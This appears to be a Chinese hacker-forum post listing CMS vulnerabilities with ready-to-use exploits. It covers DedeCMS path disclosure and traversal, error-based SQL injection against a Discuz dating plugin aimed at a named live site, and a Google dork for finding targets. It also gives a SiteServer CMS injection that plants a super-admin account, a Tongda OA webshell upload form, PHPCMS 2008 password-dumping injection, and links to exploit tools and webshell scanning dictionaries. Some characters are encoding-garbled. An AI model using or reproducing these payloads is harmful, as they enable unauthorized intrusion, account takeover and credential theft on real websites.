一、dedecms找后台
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
员帐号,新版本的就直接转向了后台.
2.include/dialog/config.php会爆出后台管理路径
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
到根目录去.不过这些版本的访问地址有些不同.
地址为require/dialog/select_soft.php?activepath=/././././././././
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
存在相同问题的文件还有
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php
/data/mysql_error_trace.inc
dedecms爆绝对路径工具:http://pan.baidu.com/share/link?shareid=424516&uk=2754130026
二、dz交友插件漏洞
测试EXP
http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
应广大基友需求~~~附上自己组合的关键字一个:谷歌关键字Powered by Discuz!inurl:jiaoyou.php
漏洞利用工具:http://pan.baidu.com/share/link?shareid=424518&uk=2754130026
3.最近360爆的 ecshop支付宝漏洞 通杀2.73及以下版本
漏洞利用工具下载:
http://pan.baidu.com/share/link?shareid=424515&uk=2754130026
4、SiteServer CMS oday
EXP:
直接访问UserCenter/login.aspx
用户名处输入:
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
密码为空,输入验证码后提交,
既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
后台拿shell 自己百度 8种方法siteserver后台getwebshell
5、几个C段ip入侵扫描或者内网入侵的小工具
iisput这个都知道
第二个这个 wvs http://pan.baidu.com/share/link?shareid=424521&uk=2754130026
第三个这个 sx http://pan.baidu.com/share/link?shareid=424527&uk=2754130026
6.通达oa getshell
下面我附一下利用exp
保存下面的代码为1.html 如果需要测试的话,只需要将192.168.56.139改成你的目标站点
exp 放在这里
<form id="frmUpload" enctype="multipart/form-data"
action="http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111″ method="post">Upload a new file:<br>
<input type="file" name="Filedata" size="50″><br>
<input type="submit" value="Upload">
<!�C http://192.168.56.139/general/vmeet/upload/temp/555.php.111 这里是上传之后的网马�C>
</form>
7 phpcms 2008 漏洞
给出exp
www.xxxxx.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2′ and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,username,0x3a,password,0×27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)�C a
8. 几个爆破 shell后门扫描字典http://pan.baidu.com/share/link?shareid=424534&uk=2754130026